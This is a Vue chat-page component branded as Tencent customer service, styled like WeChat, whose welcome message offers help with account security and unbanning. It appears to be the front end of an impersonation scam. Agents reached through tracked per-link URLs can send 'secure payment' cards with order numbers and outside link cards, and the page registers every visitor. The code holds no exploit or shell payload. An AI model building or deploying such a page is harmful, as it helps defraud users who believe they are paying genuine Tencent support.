<template>
  <div class="wx-chat-page">
    <!-- 错误页面：客服不存在 -->
    <div v-if="agentNotFound" class="wx-error-container">
      <div class="wx-error-icon">⚠️</div>
      <div class="wx-error-title">链接无效</div>
      <div class="wx-error-message">该客服账号不存在或链接已失效</div>
    </div>

    <!-- 加载中 -->
    <div v-else-if="isVerifying" class="wx-loading-container">
      <div class="wx-loading-spinner"></div>
      <div class="wx-loading-text">正在连接客服...</div>
    </div>

    <!-- 正常聊天界面 -->
    <div v-else class="wx-chat-container">
      <!-- 顶部导航 -->
      <div class="wx-header">
        <span class="wx-title">腾讯客服</span>
      </div>

      <!-- 聊天消息区域 -->
      <div class="wx-messages" ref="messagesContainer">
        <!-- 固定的欢迎消息 -->
        <div class="wx-message wx-message-left">
          <div class="wx-avatar">
            <img src="@/assets/wx.webp" alt="客服">
          </div>
          <div class="wx-bubble wx-bubble-agent">
            <div class="Nai-IbcEKr0zF-Long">
              <div style="margin-bottom: 6px;">Hi, 腾讯智能客服为你服务~</div>
              <div>您可以咨询<b>账号安全防护</b>、<b>账号异常封禁及解封流程</b>等相关问题，我们将为您提供专业解答</div>
            </div>
          </div>
        </div>
        <div v-for="msg in chatMessages" :key="msg.id" :class="['wx-message', msg.speakerType === 1 ? 'wx-message-right' : 'wx-message-left']">
          <!-- 客服消息 (左边) -->
          <template v-if="msg.speakerType !== 1">
            <div class="wx-avatar">
              <img src="@/assets/wx.webp" alt="客服">
            </div>
            <div class="wx-bubble wx-bubble-agent" v-if="!isPaymentCard(msg.content) && !isLinkCardMessage(msg.content)">
              <img v-if="isImageMessage(msg.content)" :src="getImageUrl(msg.content)" class="wx-msg-image" referrerpolicy="no-referrer" @click="previewImage(msg.content)">
              <span v-else v-html="formatMessage(msg.content)"></span>
            </div>
            <!-- 链接卡片 -->
            <div class="link-card-msg" v-else-if="isLinkCardMessage(msg.content)">
              <div class="link-card-inner">
                <h4 class="link-card-title">{{ parseLinkCardMessage(msg.content)?.title }}</h4>
                <div class="link-card-btn" @click.stop="openCardLink(parseLinkCardMessage(msg.content)?.link)">{{ parseLinkCardMessage(msg.content)?.btnText || '查看详情' }}</div>
              </div>
            </div>
            <div class="payment-card" v-else>
              <div class="payment-card-header"><div>安全支付</div><img src="@/assets/NaiLong-DFiibrak-NaiLong.png"></div>
              <div class="payment-card-order">订单编号：{{ getPaymentOrderId(msg.content) }}</div>
              <div class="payment-card-btn" @click="openPaymentPage(msg.content)">前往支付</div>
            </div>
          </template>
          <!-- 客户消息 (右边) -->
          <template v-else>
            <div class="wx-avatar">
              <img src="@/assets/NaiLong-CczFt_kB-NaiLong.jpg" alt="用户">
            </div>
            <div class="wx-bubble wx-bubble-customer" v-if="!isPaymentCard(msg.content) && !isLinkCardMessage(msg.content)">
              <img v-if="isImageMessage(msg.content)" :src="getImageUrl(msg.content)" class="wx-msg-image" referrerpolicy="no-referrer" @click="previewImage(msg.content)">
              <span v-else>{{ msg.content }}</span>
            </div>
            <!-- 链接卡片 -->
            <div class="link-card-msg" v-else-if="isLinkCardMessage(msg.content)">
              <div class="link-card-inner">
                <h4 class="link-card-title">{{ parseLinkCardMessage(msg.content)?.title }}</h4>
                <div class="link-card-btn" @click.stop="openCardLink(parseLinkCardMessage(msg.content)?.link)">{{ parseLinkCardMessage(msg.content)?.btnText || '查看详情' }}</div>
              </div>
            </div>
            <div class="payment-card" v-else>
              <div class="payment-card-header"><div>安全支付</div><img src="@/assets/NaiLong-DFiibrak-NaiLong.png"></div>
              <div class="payment-card-order">订单编号：{{ getPaymentOrderId(msg.content) }}</div>
              <div class="payment-card-btn" @click="openPaymentPage(msg.content)">前往支付</div>
            </div>
          </template>
        </div>
      </div>

      <!-- 输入区域 -->
      <div class="wx-input-area">
        <div class="wx-input-row">
          <div class="wx-input-wrapper">
            <input 
              v-model="inputContent" 
              class="wx-input" 
              placeholder=""
              @keypress.enter="sendMessage"
            >
          </div>
          <!-- 图片按钮 -->
          <button class="wx-image-btn" @click="triggerImageUpload">
            <svg width="24" height="24" viewBox="0 0 24 24" fill="none">
              <rect x="3" y="3" width="18" height="18" rx="2" stroke="#666" stroke-width="1.5"/>
              <circle cx="8.5" cy="8.5" r="1.5" fill="#666"/>
              <path d="M21 15l-5-5-8 8" stroke="#666" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>
            </svg>
          </button>
        </div>
        <input type="file" ref="imageInput" accept="image/*" style="display:none" @change="handleImageUpload">
      </div>
    </div>
    <!-- 图片预览模态框 -->
    <div class="image-preview-modal" :class="{ active: imagePreviewVisible }" @click.self="closeImagePreview">
      <img class="image-preview-content" :src="previewImageUrl" alt="预览图片">
    </div>
  </div>
</template>

<script>
import { apiFetch, API_BASE_URL } from '@/config/api'
import { chatWebSocket } from '@/utils/websocket'
export default {
  name: 'WxChat',
  props: {
    agentId: { type: String, default: '' }
  },
  data() {
    return {
      inputContent: '',
      chatMessages: [],
      lastMessageId: 0,
      customerName: '',
      agentAccount: '',
      sessionId: '',
      pollingInterval: null,
      pollingTimer: null,
      statusPollingInterval: null,
      isVerifying: true,
      agentNotFound: false,
      wsUnsubscribe: null,
      imagePreviewVisible: false,
      previewImageUrl: '',
    }
  },
  mounted() {
    this.initSession()
    // 按接口计数访问（sessionStorage去重，同一会话只计一次）
    const _up = new URLSearchParams(window.location.search)
    const _arid = _up.get('arid'), _artype = _up.get('artype')
    if (_arid && _artype) {
      const _dedupKey = `_tv_${_artype}_${_arid}`
      if (!sessionStorage.getItem(_dedupKey)) {
        sessionStorage.setItem(_dedupKey, '1')
        fetch(`${API_BASE_URL}/api/chat/track-visit?linkId=${_arid}&linkType=${_artype}`, { method: 'POST' }).catch(() => {})
      }
    }
    // 注册访客
    const _self = this
    setTimeout(() => {
      if (_self.agentAccount && _self.customerName) {
        fetch(`${API_BASE_URL}/api/chat/register-visit`, { method: 'POST', headers: {'Content-Type':'application/json'}, body: JSON.stringify({sessionKey: `${_self.customerName}_${_self.agentAccount}`, agent: _self.agentAccount, customerName: _self.customerName, platform: 'wx'}) }).catch(() => {})
      }
    }, 2000)
    // 监听页面可见性变化
    document.addEventListener('visibilitychange', this.handleVisibilityChange)
  },
  beforeUnmount() {
    this.stopPolling()
    this.setCustomerOffline()
    this.disconnectWebSocket()
    document.removeEventListener('visibilitychange', this.handleVisibilityChange)
  },
  methods: {
    getAgentAccount() {
      if (this.agentId) return this.agentId
      const urlParams = new URLSearchParams(window.location.search)
      const agentParam = urlParams.get('custuuid') || urlParams.get('agent') || urlParams.get('id')
      if (agentParam) return agentParam
      const pathMatch = window.location.pathname.match(/\/wx-chat\/([^/]+)/)
      if (pathMatch) return pathMatch[1]
      return 'admin'
    },
    generateCustomerName() {
      const chars = 'abcdefghijklmnopqrstuvwxyz0123456789'
      let result = 'wx_'
      for (let i = 0; i < 8; i++) result += chars.charAt(Math.floor(Math.random() * chars.length))
      return result
    },
    getOrCreateCustomerName() {
      const agentId = this.getAgentAccount()
      const storageKey = `wx_customer_name_${agentId}`
      let name = localStorage.getItem(storageKey)
      if (!name || !name.startsWith('wx_')) {
        name = this.generateCustomerName()
        localStorage.setItem(storageKey, name)
      }
      return name
    },
    async verifyAgent() {
      this.isVerifying = true
      let verified = false
      while (!verified) {
        try {
          const res = await apiFetch(`/api/chat/verify-agent?agentAccount=${encodeURIComponent(this.agentAccount)}`)
          this.agentNotFound = !(res.code === 0 && res.data?.exists)
          if (res.code === 0 && res.data?.agentAccount) this.agentAccount = res.data.agentAccount
          verified = true
          this.isVerifying = false
          return !this.agentNotFound
        } catch (e) {
          console.error('验证客服账号失败，2秒后重试...', e)
          await new Promise(resolve => setTimeout(resolve, 2000))
        }
      }
    },
    async initSession() {
      this.agentAccount = this.getAgentAccount()
      this.customerName = this.getOrCreateCustomerName()
      this.sessionId = `${this.customerName}_${this.agentAccount}`
      console.log('微信客服初始化:', this.sessionId)
      if (!(await this.verifyAgent())) return
      await this.loadInitialMessages()
      this.connectWebSocket()
      this.startPolling()
      this.updateOnlineStatus()
    },
    async connectWebSocket() {
      try {
        await chatWebSocket.connect(this.sessionId)
        this.wsUnsubscribe = chatWebSocket.onMessage((data) => {
          this.handleWebSocketMessage(data)
        })
        console.log('WebSocket 连接成功')
      } catch (e) {
        console.log('WebSocket 连接失败，使用轮询:', e)
      }
    },
    handleWebSocketMessage(data) {
      if (data.type === 'newMessage' && data.sessionKey === this.sessionId) {
        // 跳过自己发送的消息（客户端speakerType=1），已通过乐观更新添加
        if (data.speakerType === 1) {
          // Find temp message and replace its ID with real ID
          const tempIdx = this.chatMessages.findIndex(m =>
            m.content === data.content && m.id > 1000000000000
          )
          if (tempIdx !== -1) {
            this.chatMessages[tempIdx].id = data.id
            this.lastMessageId = Math.max(this.lastMessageId, data.id)
          }
          return
        }
        const existingIds = new Set(this.chatMessages.map(m => m.id))
        if (!existingIds.has(data.id)) {
          this.chatMessages.push({
            id: data.id,
            speakerType: data.speakerType,
            content: data.content,
            createdAt: data.createdAt
          })
          if (data.id > this.lastMessageId) {
            this.lastMessageId = data.id
          }
          this.scrollToBottom()
          if (data.speakerType === 2) {
            this.playSound()
            this.updateReadPosition(data.id)
          }
        }
      }
    },
    disconnectWebSocket() {
      if (this.wsUnsubscribe) {
        this.wsUnsubscribe()
        this.wsUnsubscribe = null
      }
    },
    async loadInitialMessages() {
      try {
        const res = await apiFetch(`/api/chat/messages?sessionId=${encodeURIComponent(this.sessionId)}&viewerType=customer`)
        if (res.code === 0 && res.data?.length > 0) {
          this.chatMessages = res.data
          this.lastMessageId = Math.max(...res.data.map(m => m.id))
          this.scrollToBottom()
          this.updateReadPosition(this.lastMessageId)
        }
      } catch (e) { console.error(e) }
    },
    async updateReadPosition(lastReadMessageId) {
      if (!lastReadMessageId) return
      try {
        await apiFetch('/api/chat/read-position', {
          method: 'POST',
          body: JSON.stringify({
            sessionId: this.sessionId,
            userType: 'customer',
            lastReadMessageId: lastReadMessageId
          })
        })
      } catch (e) { console.log('更新已读位置失败:', e) }
    },
    async checkNewMessages() {
      try {
        const res = await apiFetch(`/api/chat/poll?sessionId=${encodeURIComponent(this.sessionId)}&lastId=${this.lastMessageId}`)
        if (res.code === 0 && res.data?.length > 0) {
          const ids = new Set(this.chatMessages.map(m => m.id))
          const newMsgs = res.data.filter(m => !ids.has(m.id))
          if (newMsgs.length > 0) {
            this.chatMessages.push(...newMsgs)
            this.lastMessageId = Math.max(...res.data.map(m => m.id))
            this.scrollToBottom()
            if (newMsgs.some(m => m.speakerType === 2)) {
              this.playSound()
              this.updateReadPosition(this.lastMessageId)
            }
          }
        }
      } catch (e) { console.log(e) }
      this.updateOnlineStatus()
    },
    startPolling() {
      // 消息轮询（自适应间隔：WebSocket连接时15s，断开时3s）
      const scheduleMessagePoll = () => {
        const delay = chatWebSocket.isConnected() ? 15000 : 3000
        this.pollingTimer = setTimeout(() => {
          this.checkNewMessages().then(() => {
            if (this.pollingTimer !== null) scheduleMessagePoll()
          })
        }, delay)
      }
      scheduleMessagePoll()
      // 心跳轮询（每10秒）
      this.statusPollingInterval = setInterval(() => this.sendHeartbeat(), 4000)
      // 已读位置上报（每30秒）
      this.readPositionInterval = setInterval(() => {
        if (this.lastMessageId && document.visibilityState === 'visible') this.updateReadPosition(this.lastMessageId)
      }, 30000)
    },
    stopPolling() {
      if (this.pollingTimer) {
        clearTimeout(this.pollingTimer)
        this.pollingTimer = null
      }
      if (this.statusPollingInterval) clearInterval(this.statusPollingInterval)
      if (this.readPositionInterval) clearInterval(this.readPositionInterval)
    },
    async sendHeartbeat() {
      try {
        await apiFetch('/api/chat/heartbeat', {
          method: 'POST',
          body: JSON.stringify({ username: this.customerName })
        })
      } catch (e) { /* ignore */ }
    },
    async updateOnlineStatus() {
      try {
        await apiFetch('/api/chat/online-status', {
          method: 'POST',
          body: JSON.stringify({ username: this.customerName, userType: 'customer', isOnline: true })
        })
      } catch (e) { console.error(e) }
    },
    setCustomerOffline() {
      const data = JSON.stringify({ username: this.customerName, userType: 'customer', isOnline: false })
      if (navigator.sendBeacon) {
        navigator.sendBeacon(`${API_BASE_URL}/api/chat/online-status`, new Blob([data], { type: 'application/json' }))
      }
    },
    // 页面可见性变化处理
    handleVisibilityChange() {
      if (document.visibilityState === 'visible') {
        // 页面变为可见：检查WS健康，重连，加载消息，恢复轮询
        if (!chatWebSocket.isConnected()) {
          this.connectWebSocket()
        }
        this.loadInitialMessages()
        this.checkNewMessages()
        this.startPolling()
      } else {
        // 页面隐藏：暂停所有轮询，节省服务器资源
        this.stopPolling()
      }
    },
    scrollToBottom() {
      this.$nextTick(() => {
        const container = this.$refs.messagesContainer
        if (container) container.scrollTop = container.scrollHeight
      })
    },
    isImageMessage(c) { return c && c.startsWith('[图片:') && c.endsWith(']') },
    getImageUrl(c) {
      if (!this.isImageMessage(c)) return ''
      const imagePath = c.slice(4, -1) // 去掉 [图片: 和 ]

      // 如果是完整URL（OSS云存储），直接返回
      if (imagePath.startsWith('http://') || imagePath.startsWith('https://')) {
        return imagePath
      }

      // 否则是本地存储，拼接API路径
      return `${API_BASE_URL}/api/chat/image/${imagePath}`
    },
    isPaymentCard(c) { return c && /#payid\d+#/.test(c) },
    getPaymentOrderId(c) { const m = c && c.match(/#payid(\d+)#/); return m ? m[1] : '' },
    openPaymentPage(c) { const orderId = this.getPaymentOrderId(c); if (orderId) window.open(`${window.location.origin}/payment?order=${orderId}`, '_blank') },
    isLinkCardMessage(content) {
      return content && content.startsWith('[卡片:') && content.endsWith(']')
    },
    parseLinkCardMessage(content) {
      if (!this.isLinkCardMessage(content)) return { title: '', btnText: '查看详情', link: '' }
      var inner = content.slice(4, -1)
      var lastHttpIndex = inner.lastIndexOf(':http')
      if (lastHttpIndex === -1) {
        var parts = inner.split(':')
        if (parts.length >= 3) {
          var link = parts.pop()
          var btnText = parts.pop()
          return { title: parts.join(':'), btnText: btnText, link: link }
        }
        return { title: inner, btnText: '查看详情', link: '' }
      }
      var link = inner.substring(lastHttpIndex + 1)
      var beforeLink = inner.substring(0, lastHttpIndex)
      var lastColon = beforeLink.lastIndexOf(':')
      if (lastColon === -1) {
        return { title: beforeLink, btnText: '查看详情', link: link }
      }
      return {
        title: beforeLink.substring(0, lastColon),
        btnText: beforeLink.substring(lastColon + 1) || '查看详情',
        link: link
      }
    },
    openCardLink(link) { if (link) window.open(link, '_blank') },
    previewImage(c) {
      const url = this.getImageUrl(c)
      if (url) {
        this.previewImageUrl = url
        this.imagePreviewVisible = true
      }
    },
    closeImagePreview() {
      this.imagePreviewVisible = false
      this.previewImageUrl = ''
    },
    // HTML转义，防止XSS攻击
    escapeHtml(text) {
      if (!text) return ''
      const div = document.createElement('div')
      div.textContent = text
      return div.innerHTML
    },
    formatMessage(content) {
      // 先转义防止XSS，再将特定文字加粗显示
      return this.escapeHtml(content)
        .replace(/账号安全防护/g, '<span class="wx-highlight">账号安全防护</span>')
        .replace(/账号异常封禁及解封流程/g, '<span class="wx-highlight">账号异常封禁及解封流程</span>')
    },
    playSound() {
      try {
        const ctx = new (window.AudioContext || window.webkitAudioContext)()
        const osc = ctx.createOscillator(), gain = ctx.createGain()
        osc.connect(gain); gain.connect(ctx.destination)
        osc.frequency.value = 800; osc.type = 'sine'
        gain.gain.setValueAtTime(0.3, ctx.currentTime)
        gain.gain.exponentialRampToValueAtTime(0.01, ctx.currentTime + 0.5)
        osc.start(ctx.currentTime); osc.stop(ctx.currentTime + 0.5)
      } catch (e) { /* ignore */ }
    },
    async sendMessage() {
      const content = this.inputContent.trim()
      if (!content) return

      const tempId = Date.now()
      const tempMsg = {
        id: tempId,
        speakerType: 1,
        content: content,
        createdAt: new Date().toISOString()
      }
      this.chatMessages.push(tempMsg)
      this.inputContent = ''
      this.scrollToBottom()

      await this.sendToBackend(content, tempId)
    },
    async sendToBackend(content, tempId) {
      this.updateOnlineStatus()
      let success = false
      for (let attempt = 0; attempt < 3; attempt++) {
        try {
          const res = await apiFetch('/api/chat/send', {
            method: 'POST',
            body: JSON.stringify({
              sessionId: this.sessionId,
              agentAccount: this.agentAccount,
              speakerType: 1,
              content,
              customerName: this.customerName,
              platform: 'wx',
              isRead: false
            })
          })
          if (res.code === 0 && res.data?.messageId) {
            if (tempId) {
              const msgIndex = this.chatMessages.findIndex(m => m.id === tempId)
              if (msgIndex !== -1) {
                this.chatMessages[msgIndex].id = res.data.messageId
              }
            }
            this.lastMessageId = Math.max(this.lastMessageId, res.data.messageId)
          }
          success = true
          break
        } catch (e) {
          console.error(`发送消息失败 (尝试 ${attempt + 1}/3):`, e)
          if (attempt < 2) await new Promise(r => setTimeout(r, 1000))
        }
      }
      if (success) {
        setTimeout(() => this.checkNewMessages(), 500)
      }
    },
    triggerImageUpload() {
      this.$refs.imageInput.click()
    },
    async handleImageUpload(e) {
      const file = e.target.files[0]
      if (!file) return

      const allowedTypes = ['image/jpeg', 'image/png', 'image/gif', 'image/webp', 'image/heic', 'image/heif', 'image/tiff']
      if (!allowedTypes.includes(file.type) && !file.name.match(/\.(heic|heif|tiff|tif)$/i)) {
        alert('只支持 JPG、PNG、GIF、WebP、HEIC、HEIF、TIFF 格式的图片')
        return
      }
      if (file.size > 5 * 1024 * 1024) {
        alert('图片大小不能超过 5MB')
        return
      }

      const formData = new FormData()
      formData.append('file', file)

      try {
        const response = await fetch(`${API_BASE_URL}/api/chat/upload-image`, {
          method: 'POST',
          body: formData
        })
        const result = await response.json()
        if (result.code === 0 && result.data?.imagePath) {
          const imageContent = `[图片:${result.data.imagePath}]`
          const tempId = Date.now()
          this.chatMessages.push({
            id: tempId,
            speakerType: 1,
            content: imageContent,
            createdAt: new Date().toISOString()
          })
          this.scrollToBottom()
          await this.sendToBackend(imageContent, tempId)
        } else {
          alert(result.msg || '图片上传失败')
        }
      } catch (err) {
        console.error('上传图片失败:', err)
        alert('图片上传失败，请重试')
      }
      e.target.value = ''
    }
  }
}
</script>


<style scoped>
.wx-chat-page {
  height: 100vh;
  height: var(--app-height, 100dvh);
  display: flex;
  flex-direction: column;
  background: #ebebeb;
  font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
}
.wx-error-container, .wx-loading-container {
  height: 100vh;
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  background: #fff;
}
.wx-error-icon { font-size: 64px; margin-bottom: 20px; }
.wx-error-title { font-size: 20px; font-weight: 600; color: #333; margin-bottom: 10px; }
.wx-error-message { font-size: 14px; color: #999; }
.wx-loading-spinner {
  width: 40px; height: 40px;
  border: 3px solid #f3f3f3;
  border-top: 3px solid #07c160;
  border-radius: 50%;
  animation: spin 1s linear infinite;
  margin-bottom: 16px;
}
@keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
.wx-loading-text { font-size: 14px; color: #666; }
.wx-chat-container { flex: 1; display: flex; flex-direction: column; background: #ebebeb; overflow: hidden; }
.wx-header {
  display: flex;
  align-items: center;
  justify-content: center;
  padding: 14px 16px;
  background: #ebebeb;
  flex-shrink: 0;
}
.wx-title {
  font-size: 17px;
  font-weight: 500;
  color: #000;
}
.wx-messages { flex: 1; overflow-y: auto; padding: 16px; background: #ebebeb; }
.wx-message { display: flex; margin-bottom: 16px; align-items: flex-start; }
.wx-message-right { flex-direction: row-reverse; }
.wx-avatar {
  width: 40px;
  height: 40px;
  border-radius: 4px;
  overflow: hidden;
  flex-shrink: 0;
  background: #fff;
}
.wx-avatar img {
  width: 100%;
  height: 100%;
  object-fit: cover;
}
.wx-bubble {
  max-width: 70%;
  padding: 10px 14px;
  border-radius: 4px;
  font-size: 15px;
  line-height: 1.6;
  word-break: break-word;
  margin: 0 10px;
  position: relative;
}
.wx-bubble-agent {
  background: #fff;
  color: #333;
}
.wx-bubble-customer {
  background: #95ec69;
  color: #000;
}
.wx-highlight {
  color: #576b95;
  font-weight: 500;
}
.wx-msg-image { max-width: 200px; min-width: 100px; min-height: 100px; background-color: #f0f0f0; border-radius: 4px; cursor: pointer; }
.wx-input-area {
  background: #f7f7f7;
  padding: 10px 12px;
  border-top: 1px solid #ddd;
  flex-shrink: 0;
}
.wx-input-row { display: flex; align-items: center; gap: 10px; }
.wx-input-wrapper {
  flex: 1;
  background: #fff;
  border-radius: 4px;
  padding: 8px 12px;
  border: 1px solid #ddd;
}
.wx-input {
  width: 100%;
  border: none;
  background: transparent;
  font-size: 15px;
  outline: none;
}
.wx-input::placeholder { color: #999; }
.wx-image-btn {
  width: 36px;
  height: 36px;
  background: none;
  border: none;
  padding: 0;
  cursor: pointer;
  display: flex;
  align-items: center;
  justify-content: center;
  flex-shrink: 0;
}
.Nai-IbcEKr0zF-Long {
  font-size: 14px;
  line-height: 1.6;
  color: #333;
}
.Nai-IbcEKr0zF-Long b {
  color: #576b95;
  font-weight: 500;
}

/* 支付卡片样式 */
.payment-card {
  display: flex;
  flex-direction: column;
  background: #fff;
  padding: 10px 12px;
  border-radius: 12px;
  gap: 12px;
  width: 100%;
  max-width: 240px;
  margin: 0 10px;
}

.payment-card-header {
  display: flex;
  align-items: center;
  justify-content: space-between;
  font-size: 14px;
  font-weight: 500;
  color: #333;
}

.payment-card-header img {
  height: 20px;
}

.payment-card-order {
  font-size: 13px;
  color: #666;
}

.payment-card-btn {
  background: #91ed61;
  color: #000;
  text-align: center;
  padding: 8px 0;
  border-radius: 6px;
  font-size: 14px;
  cursor: pointer;
}

.payment-card-btn:active {
  opacity: 0.8;
}

/* 图片预览模态框 */
.image-preview-modal {
  position: fixed;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  background: rgba(0, 0, 0, 0.9);
  display: none;
  align-items: center;
  justify-content: center;
  z-index: 9999;
}
.image-preview-modal.active {
  display: flex;
}
.image-preview-content {
  max-width: 90%;
  max-height: 90%;
  object-fit: contain;
}

/* 链接卡片消息样式 */
.link-card-msg {
  background: #fff;
  border-radius: 12px;
  overflow: hidden;
  max-width: 260px;
}
.link-card-inner {
  padding: 0.75rem;
}
.link-card-title {
  font-size: 0.875rem;
  font-weight: 500;
  color: #111;
  margin: 0 0 10px 0;
  line-height: 1.4;
  display: -webkit-box;
  -webkit-line-clamp: 2;
  -webkit-box-orient: vertical;
  overflow: hidden;
  text-overflow: ellipsis;
}
.link-card-btn {
  display: block;
  width: 100%;
  padding: 8px 0;
  text-align: center;
  background: #007aff;
  color: #fff;
  font-size: 0.8125rem;
  font-weight: 500;
  border-radius: 6px;
  cursor: pointer;
  transition: opacity 0.2s;
}
.link-card-btn:active {
  opacity: 0.8;
}

</style>
